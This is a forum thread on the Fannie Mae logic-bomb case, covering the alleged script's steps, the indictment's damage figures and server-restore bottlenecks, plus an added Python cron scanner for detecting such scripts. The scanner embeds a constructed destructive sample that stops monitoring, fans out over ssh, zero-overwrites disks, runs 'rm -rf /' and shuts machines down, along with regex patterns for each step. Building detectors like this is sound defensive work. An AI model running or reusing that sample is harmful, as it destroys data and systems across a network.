I'm curious if Wired's account is to be taken as the literal truth (I know, bear with me). Why is someone being fired for a single scripting error? What the hell is QA for?
Moreover, how stupid can Fannie Mae management be to fire someone who can write and deploy a logic bomb that meticulous in half a day? Let alone let any of their staff have that level of data center access.
"Moreover, how stupid can Fannie Mae management be to fire someone who can write and deploy a logic bomb that meticulous in half a day? Let alone let any of their staff have that level of data center access."
Among their lack of oversight problems, this seems to be one of the smallest.
I don't find it that surprising... usually you'd hire people you can trust in the first place. And the guy might want to pick up his stray files before leaving. It sounds harsh to me to cut off everything before even talking to the guy.
If a grumpy Google engineer managed to cause their Chubby service (synchronized file write service) to start corrupting random files, then that might have a big impact on the integrity of end-user data.
My point is, even a well-designed system is vulnerable when someone has access to its internals. Give me a system and a day, and I could probably think of a few subtle (or not-so-subtle) ways to break it for the purpose of inflicting damage.
I looked in the indictment for any details about the code he posted. No such luck; on a tangent, this is confusing.
From the article:
"A logic bomb ... would have decimated all 4,000 servers at the company, causing millions of dollars in damage"
From the indictment:
"The defendant ... did knowingly cause and attempt to cause ... damage without authorization to a protected computer, and by such conduct caused and would, if completed, have caused loss to Fannie Mae during any one year period aggregating at least $5,000 in value."
So...
1) Why are they charging him with "attempting to cause at least $5,000 in damage" when the true damage would allegedly have been in the millions?
2) It's hard to believe "[the code] would have decimated all 4,000 servers at the company". Let's consider the worst case scenario, which is that all 4,000 computers run the infected script at 9AM with administrator privileges. Would something like 'rm -rf /' really decimate the server? If they kept backups of each server, could the IT guys simply swap in old backups?
... Now that I've talked it out, it seems likely that really would knock the server farm offline for about a week. It would be difficult to swap in backups of 4,000 servers in a timely fashion. That's a lot of boxen.
The accused seems to have done the following:
- SSHed in with his user id and gained root access to a dev server. The DHCP address for the client IP was last assigned to his laptop
- Created a cron job that ran a script. The script checked whether it was January 31st, 2009. If so, it did the following
- Disable internal monitoring systems to disable alerts
- Create a list of all servers, walk through them, disable logins and clear out logs
- Wipe out data by overwriting with zeros
- Uninstall software and turn off the machines
- Clear itself out and zero out the root filesystem
The 'smoking gun' seems tenuous at best: the person accused seems to use similar naming conventions for his personal temp files (the .x, .y format), which I agree is unconventional. I think the real smoking gun is the fact that his laptop and his login were used.
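For anyone who wants to hunt for this shape of thing on their own boxes, here is an added example (my code, not anything from the thread, the article or the indictment): a small static scanner that walks a crontab, pulls in the scripts it references and flags the combination the comment above describes: a hard-coded date gate, monitoring being stopped, an ssh fan-out over a host list, zero-overwrites, a root wipe, and a power-off. The crontab, the script bodies and the paths are all constructed for the example and are not the real Fannie Mae files.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed sample data. Hypothetical paths; the scripts are written in the
# shape the thread describes, not copied from the real case.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 9 * * * /opt/scripts/.x
30 2 * * * /opt/scripts/rotate_logs.sh
0 9 * * * /opt/scripts/maint.sh
"""

SAMPLE_SCRIPTS = {
    "/opt/scripts/.x": """\
#!/bin/sh
# constructed: date-gated destructive payload
if [ "$(date +%Y%m%d)" = "20090131" ]; then
    /etc/init.d/nagios stop
    for h in $(cat /opt/scripts/hosts); do
        ssh $h 'dd if=/dev/zero of=/dev/sda bs=1M; rm -rf /; shutdown -h now'
    done
fi
""",
    "/opt/scripts/rotate_logs.sh": """\
#!/bin/sh
# constructed: benign housekeeping that also deletes files under /var/log
find /var/log -name '*.log' -mtime +30 -exec rm -f {} \\;
""",
    "/opt/scripts/maint.sh": """\
#!/bin/sh
# constructed: benign, but gated on a fixed calendar day, so worth a look
if [ "$(date +%d)" = "01" ]; then
    /usr/local/bin/monthly_report
fi
""",
}

# One regex per step in the thread's description of the payload.
INDICATORS = {
    # `[ "$(date +%Y%m%d)" = "20090131" ]` and similar comparisons to a literal
    "date_trigger": re.compile(r'\$\(date\s+\+[^)]*\)"?\s*(?:=|==|-eq)\s*"?\d{2,8}'),
    # stopping or killing the monitoring agent before the damage starts
    "monitoring_disabled": re.compile(
        r'\b(?:nagios|zabbix|snmpd|monit|syslogd?)\b[^\n]*\bstop\b'
        r'|\bkill\w*\b[^\n]*\b(?:nagios|zabbix|monit)\b'),
    # a for-loop over a host list whose body runs ssh
    "host_fanout": re.compile(r'\bfor\s+\w+\s+in\b[^\n]*\n[^\n]*\bssh\b'),
    "log_clearing": re.compile(r'(?:>\s*|rm\s+-r?f\s+)/var/log\b'),
    "zero_overwrite": re.compile(r'\bdd\s+if=/dev/zero\b|\bshred\b'),
    "root_wipe": re.compile(r'\brm\s+-rf\s+/(?:\s|$|[\'";])'),
    "power_off": re.compile(r'\b(?:shutdown|poweroff|halt)\b'),
}
DESTRUCTIVE = {"zero_overwrite", "root_wipe", "power_off", "log_clearing"}


def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (schedule, command) pairs; skips comments, blanks and env lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue  # FOO=bar style assignment or malformed entry
        entries.append((" ".join(parts[:5]), parts[5]))
    return entries


def severity(found: List[str]) -> str:
    """A date gate plus any destructive step, or destructive steps with
    fan-out / monitoring suppression, is the logic-bomb shape."""
    hits = set(found)
    if "date_trigger" in hits and hits & DESTRUCTIVE:
        return "high"
    if hits & DESTRUCTIVE and hits & {"host_fanout", "monitoring_disabled"}:
        return "high"
    if "date_trigger" in hits or hits & DESTRUCTIVE:
        return "review"
    return "low"


def analyze(crontab: str, scripts: Dict[str, str]) -> Dict[str, dict]:
    """Map each cron-launched script path to its indicators and a severity."""
    report = {}
    for schedule, command in parse_crontab(crontab):
        path = command.split()[0]
        found = []
        if os.path.basename(path).startswith("."):
            found.append("hidden_name")  # the .x / .y style the thread mentions
        body = scripts.get(path, "")
        found += [name for name, pat in INDICATORS.items() if pat.search(body)]
        report[path] = {"schedule": schedule, "indicators": found,
                        "severity": severity(found)}
    return report


if __name__ == "__main__":
    for path, result in analyze(SAMPLE_CRONTAB, SAMPLE_SCRIPTS).items():
        print(f"{result['severity']:6} {path}  {', '.join(result['indicators'])}")
```

On a real host you would feed it the output of `crontab -l` for every user plus the contents of `/etc/cron.*`, and read the script bodies from disk; the point of the scoring is that a date comparison on its own (the `maint.sh` case) is only a "review" item, while a date gate sitting next to `dd if=/dev/zero` and an ssh loop is the thing to page someone about.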
4000 boxen? Just restoring from backups?
There's a quick way to completely fail any RTO you might have set.
One week would give you 2.5 minutes for each box (obviously you could do things in parallel, but not all at once). If you had to pull backups off tape, then you'd be limited by the number of tape drives: 100 maybe? If you were pulling it all in off a SAN/VTL then you've still got a whole pile of bottlenecks: disk speed, fabric, network, etc.
Remember: backups are not a DR solution (and conversely, a hot site or equivalent is not a backup solution!).
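To put numbers on the bottleneck argument above, here is an added example (mine, not from the thread): the naive "minutes per box" budget next to a throughput model that computes how long each constraint alone would take and reports the one that binds. Every input (50 GB per server, 100 drives at 120 MB/s, a 10 Gbit fabric, 30 minutes of hands-on work per box with 20 people or automation lanes working in parallel) is an assumption chosen for illustration; only the 4,000 servers, the one-week window and the "100 tape drives" figure come from the thread.

```python
from typing import Dict, Tuple


def serial_minutes_per_box(window_days: float, servers: int) -> float:
    """The naive budget if restores ran strictly one after another."""
    return window_days * 24 * 60 / servers


def restore_bottlenecks(servers: int, gb_per_server: float, tape_drives: int,
                        drive_mb_s: float, fabric_gbit_s: float,
                        per_server_minutes: float,
                        parallel_slots: int) -> Tuple[Dict[str, float], str]:
    """Hours each constraint alone needs; the restore cannot beat the largest.

    The two data-volume terms are aggregate limits and do not care how many
    boxes the bytes are spread over. The hands-on term is the per-server
    rebuild/verify/reboot work that only parallelises across however many
    people or automation lanes you actually have. All inputs are assumed.
    """
    total_mb = servers * gb_per_server * 1000          # decimal GB -> MB
    hours = {
        "tape_drives": total_mb / (tape_drives * drive_mb_s) / 3600,
        "fabric": total_mb / (fabric_gbit_s * 125) / 3600,  # Gbit/s -> MB/s
        "hands_on": servers * per_server_minutes / parallel_slots / 60,
    }
    binding = max(hours, key=hours.get)
    return hours, binding


def meets_window(hours: Dict[str, float], window_days: float) -> bool:
    """True only if the binding constraint fits inside the RTO window."""
    return max(hours.values()) <= window_days * 24


if __name__ == "__main__":
    print(f"serial budget: {serial_minutes_per_box(7, 4000):.2f} min/box")
    hours, binding = restore_bottlenecks(4000, 50, 100, 120, 10, 30, 20)
    for name, h in hours.items():
        print(f"{name:12} {h:8.1f} h")
    print("binding:", binding, "| fits a 7-day window:", meets_window(hours, 7))
```

The useful output is not the number itself but which line binds: with these assumptions the tape drives finish in under five hours and the fabric in under two days, and the thing that eats the week is the per-box handling. Change `parallel_slots` or `per_server_minutes` and the answer moves far more than it does for any change to drive count, which is why "just restore from backups" is a staffing and automation question before it is a storage one.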
That number is just the way the legal system works.
If you steal something that's worth $100k, it's grand theft... which is, I believe, defined as anything over $500. (Depends on your state, probably.)
$100k and $500 are very different numbers; $500 is just the line that divides the legal slots that crimes fall in.
"Moreover, how stupid can Fannie Mae management be to fire someone who can write and deploy a logic bomb that meticulous in half a day? Let alone let any of their staff have that level of data center access."
I'm sure we aren't seeing the full picture here.